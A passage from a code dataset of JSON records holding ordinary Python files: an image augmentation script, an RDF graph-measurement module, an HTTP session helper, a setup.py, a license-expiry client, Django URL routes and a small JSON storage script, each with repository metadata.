ET\n\nfrom config import img_path_color_transform, img_path_color_transformed, class_color_transform_mode, clahe_img_ksize, brightness_diff\n\ndef hisColor_Img(org_path,dir_path):\n img = cv2.imread(org_path,cv2.CV_8UC1)\n img_eq = cv2.equalizeHist(img)\n cv2.imwrite(dir_path,img_eq);\n pass\n\ndef clahe_Img(org_path,dir_path,ksize):\n image = cv2.imread(org_path, cv2.IMREAD_COLOR)\n b, g, r = cv2.split(image)\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(ksize,ksize))\n b = clahe.apply(b)\n g = clahe.apply(g)\n r = clahe.apply(r)\n image = cv2.merge([b, g, r])\n cv2.imwrite(dir_path,image);\n\ndef brightness_Img(org_path,dir_path,brightness):\n img = cv2.imread(org_path)\n imgHeight,imgWidth,imgDeep = img.shape\n trans_img = np.zeros((imgHeight, imgWidth, 1), np.uint8)\n for i in range(0, imgHeight):\n for j in range(0, imgWidth):\n a,b,intensity = map(int,img[i,j])\n intensity += brightness\n if intensity > 255:\n intensity = 255\n trans_img[i, j] = intensity\n cv2.imwrite(dir_path,trans_img);\n\ndef write_label(anno_path,anno_write_path):\n tree = ET.parse(anno_path)\n tree.write(anno_write_path)\n\ndef color_transform(classname,img_dir,anno_dir,img_write_dir,anno_write_dir):\n if not os.path.exists(img_write_dir):\n os.makedirs(img_write_dir)\n\n if not os.path.exists(anno_write_dir):\n os.makedirs(anno_write_dir)\n img_names=os.listdir(img_dir)\n for img_name in img_names:\n if img_name.endswith('.png'):\n if(class_color_transform_mode[classname][0] == True):\n img_path=os.path.join(img_dir,img_name)\n img_write_path=os.path.join(img_write_dir,img_name[:-4]+'hiscolor'+'.png')\n anno_path=os.path.join(anno_dir,img_name[:-4]+'.xml')\n anno_write_path = os.path.join(anno_write_dir, img_name[:-4]+'hiscolor'+'.xml')\n hisColor_Img(img_path,img_write_path)\n write_label(anno_path,anno_write_path)\n\n if(class_color_transform_mode[classname][1] == True):\n img_path=os.path.join(img_dir,img_name)\n img_write_path=os.path.join(img_write_dir,img_name[:-4]+'clahe'+'.png')\n anno_path=os.path.join(anno_dir,img_name[:-4]+'.xml')\n anno_write_path = os.path.join(anno_write_dir, img_name[:-4]+'clahe'+'.xml')\n clahe_Img(img_path,img_write_path,clahe_img_ksize)\n write_label(anno_path,anno_write_path)\n\n if(class_color_transform_mode[classname][2] == True):\n img_path=os.path.join(img_dir,img_name)\n img_write_path=os.path.join(img_write_dir,img_name[:-4]+'brightness'+'.png')\n anno_path=os.path.join(anno_dir,img_name[:-4]+'.xml')\n anno_write_path = os.path.join(anno_write_dir, img_name[:-4]+'brightness'+'.xml')\n brightness_Img(img_path,img_write_path,brightness_diff)\n write_label(anno_path,anno_write_path)\n\nif __name__ == \"__main__\":\n if not os.path.exists(img_path_color_transformed):\n os.mkdir(img_path_color_transformed)\n for classname in class_color_transform_mode.keys():\n if not os.path.exists(os.path.join(img_path_color_transform,classname)):\n print(\"no\",classname,\"file in the path,check next class\")\n continue\n if not os.path.exists(os.path.join(img_path_color_transformed,classname)):\n os.mkdir(os.path.join(img_path_color_transformed,classname))\n print(\"working on\",classname)\n color_transform(classname,img_path_color_transform + '/' + classname, img_path_color_transform + '/' + classname, img_path_color_transformed + '/' + classname, img_path_color_transformed + '/' + classname)\n pass\n\n", "repo_name": "ft1148137/deepLearingDataWork", "sub_path": "data_work/color_transform.py", "file_name": "color_transform.py", "file_ext": "py", "file_size_in_byte": 3898, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.CV_8UC1", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.equalizeHist", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.createCLAHE", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 35, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 38, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 38, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 47, "usage_type": "call"}, {"api_name": "config.class_color_transform_mode", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "config.class_color_transform_mode", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "config.clahe_img_ksize", "line_number": 63, "usage_type": "argument"}, {"api_name": "config.class_color_transform_mode", "line_number": 66, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "config.brightness_diff", "line_number": 71, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 75, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 75, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 76, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 76, "usage_type": "argument"}, {"api_name": "config.class_color_transform_mode.keys", "line_number": 77, "usage_type": "call"}, {"api_name": "config.class_color_transform_mode", "line_number": 77, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "config.img_path_color_transform", "line_number": 78, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 81, "usage_type": "argument"}, {"api_name": "os.mkdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "config.img_path_color_transformed", "line_number": 82, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "config.img_path_color_transform", "line_number": 84, "usage_type": "name"}, {"api_name": "config.img_path_color_transformed", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "16751637260", "text": "from collections import defaultdict\nimport typing\n\nimport pandas as pd # type: ignore # pylint: disable=E0401\nimport rdflib # type: ignore # pylint: disable=E0401\n\nfrom .kglab import KnowledgeGraph\nfrom .pkg_types import Census_Item, Census_Dyad_Tally\n\n\nclass Simplex0:\n \"\"\"\nCount the distribution of a class of items in an RDF graph.\nIn other words, tally an \"item census\" – to be consistent with the usage of that term.\n \"\"\"\n\n def __init__ (\n self,\n name: str = \"generic\",\n ) -> None:\n \"\"\"\nConstructor for an item census.\n\n name:\noptional name for this measure\n \"\"\"\n self.name = name\n self.count: dict = defaultdict(int)\n self.df = None\n\n\n def increment (\n self,\n item0: Census_Item,\n ) -> None:\n \"\"\"\nIncrement the count for this item.\n\n item0:\nan item (domain: node, predicate, label, URL, literal, etc.) 
to be counted\n \"\"\"\n self.count[item0] += 1\n\n\n def get_tally (\n self\n ) -> typing.Optional[pd.DataFrame]:\n \"\"\"\nAccessor for the item counts.\n\n returns:\na [`pandas.DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) with the count distribution, sorted in ascending order\n \"\"\"\n self.df = pd.DataFrame.from_dict(\n self.count,\n orient=\"index\",\n columns=[\"count\"],\n ).sort_values(\"count\", ascending=False)\n return self.df\n\n\n def get_keyset (\n self\n ) -> set:\n \"\"\"\nAccessor for the set of items (domain) counted.\n\n returns:\nset of keys for the items (domain: nodes, predicates, labels, URLs, literals, etc.) that were counted\n \"\"\"\n return { key.toPython() for key in self.count.keys() }\n\n\nclass Simplex1 (Simplex0):\n \"\"\"\nMeasure a dyad census in an RDF graph, i.e., count the relations (directed edges) which connect two nodes.\n \"\"\"\n\n def __init__ (\n self,\n name: str = \"generic\",\n ) -> None:\n \"\"\"\nConstructor for a dyad census.\n\n name:\noptional name for this measure\n \"\"\"\n super().__init__(name=name) # type: ignore\n self.link_map: typing.Optional[dict] = None\n\n\n def increment ( # type: ignore # pylint: disable=W0221 # lgtm[py/inheritance/signature-mismatch]\n self,\n item0: Census_Item,\n item1: Census_Item,\n ) -> None:\n \"\"\"\nIncrement the count for a dyad represented by the two given items.\n\n item0:\n\"source\" item (domain: node, label, URL, etc.) to be counted\n\n item1:\n\"sink\" item (range: node, label, literal, URL, etc.) to be counted\n \"\"\"\n link = (item0, item1,)\n self.count[link] += 1\n\n\n def get_tally_map (\n self\n ) -> Census_Dyad_Tally:\n \"\"\"\nAccessor for the dyads census.\n\n returns:\na tuple of a [`pandas.DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) with the count distribution, sorted in ascending order; and a map of the observed links between \"source\" and \"sink\" items\n \"\"\"\n super().get_tally()\n self.link_map = defaultdict(set)\n\n for index, _ in self.df.iterrows(): # type: ignore\n item0, item1 = index\n self.link_map[item0].add(item1)\n\n return self.df, self.link_map\n\n\nclass Measure:\n \"\"\"\nThis class measures an RDF graph.\nIts downstream use cases include: graph size estimates; computation costs; constructed shapes.\nSee <https://derwen.ai/docs/kgl/concepts/#measure>\n\nCore feature areas include:\n\n * descriptive statistics\n * topological analysis\n \"\"\"\n\n def __init__ (\n self,\n *,\n name: str = \"generic\",\n ) -> None:\n \"\"\"\nConstructor for this graph measure.\n\n name:\noptional name for this measure\n \"\"\"\n self.name = name\n self.edge_count = 0\n self.node_count = 0\n self.reset()\n\n\n def reset (\n self\n ) -> None:\n \"\"\"\nReset (reinitialize) all of the counts for different kinds of census, which include:\n\n * total nodes\n * total edges\n * count for each kind of *subject* (`Simplex0`)\n * count for each kind of *predicate* (`Simplex0`)\n * count for each kind of *object* (`Simplex0`)\n * count for each kind of *literal* (`Simplex0`)\n * item census (`Simplex1`)\n * dyad census (`Simplex1`)\n \"\"\"\n self.edge_count = 0\n self.node_count = 0\n self.s_gen = Simplex0(\"subject\")\n self.p_gen = Simplex0(\"predicate\")\n self.o_gen = Simplex0(\"object\")\n self.l_gen = Simplex0(\"literal\")\n self.n_gen = Simplex1(\"node\")\n self.e_gen = Simplex1(\"edge\")\n\n\n def get_node_count (\n self\n ) -> int:\n \"\"\"\nAccessor for the node count.\n\n 
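This value is populated by `measure_graph()` as the number of distinct subjects and objects observed in the graph.\n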
returns:\nvalue of `node_count`\n \"\"\"\n return self.node_count\n\n\n def get_edge_count (\n self\n ) -> int:\n \"\"\"\nAccessor for the edge count.\n\n returns:\nvalue of `edge_count`\n \"\"\"\n return self.edge_count\n\n\n def measure_graph (\n self,\n kg: KnowledgeGraph,\n ) -> None:\n \"\"\"\nRun a full measure of the given RDF graph.\n\n kg:\n`KnowledgeGraph` object representing the RDF graph to be measured\n \"\"\"\n for s, p, o in kg.rdf_graph():\n self.edge_count += 1\n self.s_gen.increment(s)\n self.p_gen.increment(p)\n self.n_gen.increment(s, p)\n\n if isinstance(o, rdflib.term.Literal):\n self.l_gen.increment(o)\n else:\n self.o_gen.increment(o)\n self.e_gen.increment(p, o)\n\n self.node_count = len(set(self.s_gen.count.keys()).union(set(self.o_gen.count.keys())))\n\n\n def get_keyset (\n self,\n *,\n incl_pred: bool = True,\n ) -> typing.List[str]:\n \"\"\"\nAccessor for the set of items (domain: nodes, predicates, labels, URLs, literals, etc.) that were measured.\nUsed for *label encoding* in the transform between an RDF graph and a matrix or tensor representation.\n\n incl_pred:\nflag to include the predicates in the set of keys to be encoded\n\n returns:\nsorted list of keys to be used in the encoding\n \"\"\"\n keys = self.s_gen.get_keyset().union(self.o_gen.get_keyset())\n\n if incl_pred:\n keys = keys.union(self.p_gen.get_keyset())\n\n return sorted(list(keys))\n", "repo_name": "DerwenAI/kglab", "sub_path": "kglab/topo.py", "file_name": "topo.py", "file_ext": "py", "file_size_in_byte": 6413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 520, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 28, "usage_type": "call"}, {"api_name": "pkg_types.Census_Item", "line_number": 34, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pkg_types.Census_Item", "line_number": 95, "usage_type": "name"}, {"api_name": "pkg_types.Census_Item", "line_number": 96, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 121, "usage_type": "call"}, {"api_name": "pkg_types.Census_Dyad_Tally", "line_number": 113, "usage_type": "name"}, {"api_name": "kglab.KnowledgeGraph", "line_number": 210, "usage_type": "name"}, {"api_name": "rdflib.term", "line_number": 224, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 237, "usage_type": "attribute"}]} +{"seq_id": "43384466456", "text": "# -*- coding: utf-8 -*-\nimport requests\nimport pickle\nfrom cookielib import LWPCookieJar\nclass HttpRequests:\n def __init__(self,isLoadCookie=False):\n self.req=requests.session()\n self.cookieFileName=\"cookieJar\"\n if isLoadCookie :\n self.__loadCookie()\n self.req.headers['referer']='http://d.web2.qq.com/proxy.html?v=20030916001&callback=1&id=2'\n self.req.headers['Accept']= 'application/javascript, */*;q=0.8';\n self.req.headers['User-Agent']=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36\";\n def __addHeaders(self,headers):\n for k in headers:\n self.req.headers[k]=headers[k]\n pass\n def __saveCookies(self):\n with 
open(self.cookieFileName, 'w') as f:\n pickle.dump(requests.utils.dict_from_cookiejar(self.req.cookies), f)\n def __loadCookie(self):\n with open(self.cookieFileName) as f:\n cookies = requests.utils.cookiejar_from_dict(pickle.load(f))\n self.req.cookies=cookies\n def get(self,url,headers=None):\n if headers:\n self.__addHeaders(headers)\n ret=self.req.get(url).text\n self.__saveCookies()\n return ret\n def post(self,url,data,headers=None,getCookie=None):\n if headers:\n self.__addHeaders(headers)\n ret=self.req.post(url,data=data).text\n self.__saveCookies()\n return ret\n pass\n def getCookies(self):\n return self.req.cookies\n def downloadFile(self,url,fileName):\n output = open(fileName, 'wb')\n output.write(self.req.get(url).content)\n output.close()\n\n\n\n\n", "repo_name": "lvxinwei/WEBQQ", "sub_path": "HttpRequests.py", "file_name": "HttpRequests.py", "file_ext": "py", "file_size_in_byte": 1702, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.session", "line_number": 7, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.utils.dict_from_cookiejar", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 20, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "1249527896", "text": "\"\"\"\nmdplifs\nTool to calculate protein-ligand interaction fingerprints from molecular dynamics trajectories.\n\"\"\"\nfrom setuptools import setup\nimport versioneer\n\nshort_description = __doc__.split(\"\\n\")\n\ntry:\n with open(\"README.md\", \"r\") as handle:\n long_description = handle.read()\nexcept Exception:\n long_description = \"\\n\".join(short_description[2:])\n\n\nsetup(\n # Self-descriptive entries which should always be present\n name='mdplifs',\n author='David W.
Wright',\n author_email='dave.william.wright@gmail.com',\n description=short_description[0],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n license='MIT',\n\n # Which Python importable modules should be included when your package is installed\n packages=['mdplifs', \"mdplifs.tests\"],\n\n # Optional include package data to ship with your package\n # Comment out this line to prevent the files from being packaged with your software\n # Extend/modify the list to include/exclude other items as need be\n package_data={'mdplifs': [\"data/*.dat\"]\n },\n\n # Additional entries you may want; simply uncomment the lines you want and fill in the data\n # url='http://www.my_package.com', # Website\n # install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment\n # platforms=['Linux',\n # 'Mac OS-X',\n # 'Unix',\n # 'Windows'], # Valid platforms your code works on, adjust to your flavor\n python_requires=\">=3.5\", # Python version restrictions\n\n # Manual control if final package is compressible or not, set False to prevent the .egg from being made\n # zip_safe=False,\n\n # Make command line script available\n entry_points={'console_scripts': ['mdplifs = mdplifs.cli:main']},\n)\n", "repo_name": "dww100/mdplifs", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "versioneer.get_version", "line_number": 25, "usage_type": "call"}, {"api_name": "versioneer.get_cmdclass", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "22806644516", "text": "import json\nfrom base64 import b64decode\n\nfrom datetime import date, timedelta, datetime\nfrom urllib.request import urlopen, URLError\nimport requests\nimport os\n\nURL_API = 'http://localhost:1915'\n\nPAGE_GET_TIME = 'http://just-the-time.appspot.com/'\n# LICENSE = KEYGEN + DATA_EXPIRED (KEYGEN == rsa)\nHEADERS = {\n 'Content-Type': 'application/json'\n}\nimport sys\n\nclass LICENSE_CLIENT:\n\n def __init__(self):\n\n self.license_backup = os.path.join(os.path.dirname(__file__), \"license_backup/license.txt\")\n def activeLicense(self, license):\n \"\"\"\n Activate the license\n :param license:\n :return:\n \"\"\"\n # res = self.db.findLicenseAndUpdate(license)\n # return res\n data = {\"license\": license}\n url = URL_API + '/check_license'\n try:\n result = requests.post(url, json=data, headers=HEADERS)\n if result.ok:\n self.save_license(license)\n print(result.json())\n result_active = result.json()['result']\n return result_active\n else:\n result.raise_for_status()\n return False\n except Exception as error:\n print(error)\n return False\n\n def get_key_and_date_from_license(self, license):\n \"\"\"\n\n :param license:\n :return: keygen and date_expired\n \"\"\"\n keygen, date_expired = license[:-11], license[-11:]\n keygen = keygen + \"==\"\n date_expired = date_expired + \"=\"\n return keygen, date_expired\n\n def check_expired(self, license):\n \"\"\"\n Internet Environment\n :param license:\n :return: False if not expired, True if expired / not internet\n \"\"\"\n\n if not self.check_have_internet():\n print(\"No internet\")\n return True\n\n keygen, date_expired = self.get_key_and_date_from_license(license)\n\n # DECODE date_expired\n # prevent
user edit license.txt\n try:\n date_expired_byte = date_expired.encode('ascii')\n date_expired_decode = b64decode(date_expired_byte) # bytes\n print(date_expired_decode)\n date_expired = datetime.strptime(date_expired_decode.decode('ascii'), '%Y%m%d').date()\n except Exception as err:\n print(err)\n return False\n if self.check_have_internet():\n date_now = self.get_time_online()\n else:\n date_now = date.today()\n print(date_expired)\n if date_now > date_expired:\n print(\"Expired license\")\n return True\n else:\n print(\"Not expired license\")\n return False\n\n def get_time_online(self):\n \"\"\"\n\n :return: date object\n \"\"\"\n page_time = urlopen(PAGE_GET_TIME)\n time_now = page_time.read().strip()\n date_now = datetime.strptime(time_now.decode('utf-8'), '%Y-%m-%d %H:%M:%S').date()\n return date_now\n\n def check_have_internet(self):\n try:\n urlopen('http://216.58.192.142', timeout=1)\n return True\n except URLError as err:\n return False\n\n def save_license(self, license):\n with open(self.license_backup, 'w') as f:\n f.write(license)\n\n def load_license(self):\n if not os.path.exists(self.license_backup):\n return \"\"\n with open(self.license_backup, 'r') as f:\n license = f.read().strip()\n\n return license\n\n def check_license_valid(self, license):\n pass\n\n\n\nif __name__ == \"__main__\":\n\n license = \"Cg0QrcO8nIDU0ETsC1Bbo5G+NHhwZ0qlA4p2ioeu+zBoOucBEIWk4yRn+wudKJanRY3D5dLHGmXJmj0xFHxWNwMjAyMDA5MTc\"\n lis_client = LICENSE_CLIENT()\n\n #print(lis_client.activeLicense(license))\n license = lis_client.load_license()\n print(lis_client.check_expired(license))", "repo_name": "henryle97/License-Project", "sub_path": "client/license_client.py", "file_name": "license_client.py", "file_ext": "py", "file_size_in_byte": 3885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 84, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 105, "usage_type": "call"}, {"api_name": "urllib.request.URLError", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}]} +{"seq_id": "70144662566", "text": "from django.urls import path\n\nfrom apps.order.api_endpoints import (\n GetDeliveryOrderPriceAPIView,\n GetOrderPriceAPIView,\n OrderAcceptView,\n OrderCancelView,\n OrderCreateView,\n OrderDetailView,\n OrderListView,\n PromocodeRetrieveView,\n UserOrderCancelView,\n UserOrderListView,\n)\n\n\nurlpatterns = [\n path(\"\", OrderListView.as_view(), name=\"order-list\"),\n path(\"user-order-list/\", 
UserOrderListView.as_view(), name=\"user-order-list\"),\n path(\"create/\", OrderCreateView.as_view(), name=\"order-create\"),\n path(\"accept/\", OrderAcceptView.as_view(), name=\"order-accept\"),\n path(\"cancel/\", OrderCancelView.as_view(), name=\"order-cancel\"),\n path(\"user-cancel/\", UserOrderCancelView.as_view(), name=\"user-order-cancel\"),\n path(\"<int:pk>/\", OrderDetailView.as_view(), name=\"order-detail\"),\n path(\"promocode/<str:code>/\", PromocodeRetrieveView.as_view(), name=\"promocode-retrieve\"),\n path(\"get-price/\", GetOrderPriceAPIView.as_view(), name=\"order-get-price\"),\n path(\"get-delivery-price/\", GetDeliveryOrderPriceAPIView.as_view(), name=\"order-get-price-delivery\"),\n]\n", "repo_name": "khodjiyev2o/tranzit.uz", "sub_path": "apps/order/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1112, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderListView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderListView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderListView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderListView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCreateView.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCreateView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderAcceptView.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderAcceptView", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCancelView.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderCancelView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderCancelView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.UserOrderCancelView", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderDetailView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.OrderDetailView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.PromocodeRetrieveView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.PromocodeRetrieveView", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetOrderPriceAPIView.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetOrderPriceAPIView", "line_number": 26, "usage_type": "name"}, {"api_name":
"django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetDeliveryOrderPriceAPIView.as_view", "line_number": 27, "usage_type": "call"}, {"api_name": "apps.order.api_endpoints.GetDeliveryOrderPriceAPIView", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "4307414815", "text": "import json\n\ndef get_stored_number():\n \"\"\"Get the number if one is stored.\"\"\"\n filename = 'veriyi_saklamak\\\\uygulama\\\\jsons\\\\kullanici_verisi.json'\n try:\n with open(filename) as f:\n fav_number = json.load(f)\n except FileNotFoundError:\n return None\n else:\n return fav_number\n \ndef get_new_number():\n \"\"\"Ask for a new number.\"\"\"\n filename = 'veriyi_saklamak\\\\uygulama\\\\jsons\\\\kullanici_verisi.json'\n fav_number = input(\"What is your favourite number? \")\n with open(filename, 'w') as f:\n json.dump(fav_number, f)\n return fav_number\n\ndef greet_user():\n \"\"\"Greet the user.\"\"\"\n fav_number = get_stored_number()\n if fav_number:\n print(\"I know your favourite number! It's \" + str(fav_number) + \".\")\n else:\n fav_number = get_new_number()\n print(\"Okay, that is your favourite number, \" + str(fav_number) + \"!\")\n\ngreet_user()", "repo_name": "Yusufygc/PythonCalismalari", "sub_path": "Dosya_islemleri_ve_ozel_durumlar/veriyi_saklamak/uygulama/uygulama_okuma_ve_yazma.py", "file_name": "uygulama_okuma_ve_yazma.py", "file_ext": "py", "file_size_in_byte": 891, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "72845065766", "text": "import logging\nimport os\nimport sys\n\nimport geonode\nfrom geonode.settings import *\nimport pyproj\n\n#\n# General Django development settings\n#\n\nSITENAME = 'MapStory'\nSITEURL = \"%s://%s\" % (os.environ['PUBLIC_PROTOCOL'], os.environ['PUBLIC_HOST'])\n\n# Defines the directory that contains the settings file as the LOCAL_ROOT\n# It is used for relative settings elsewhere.\nLOCAL_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), 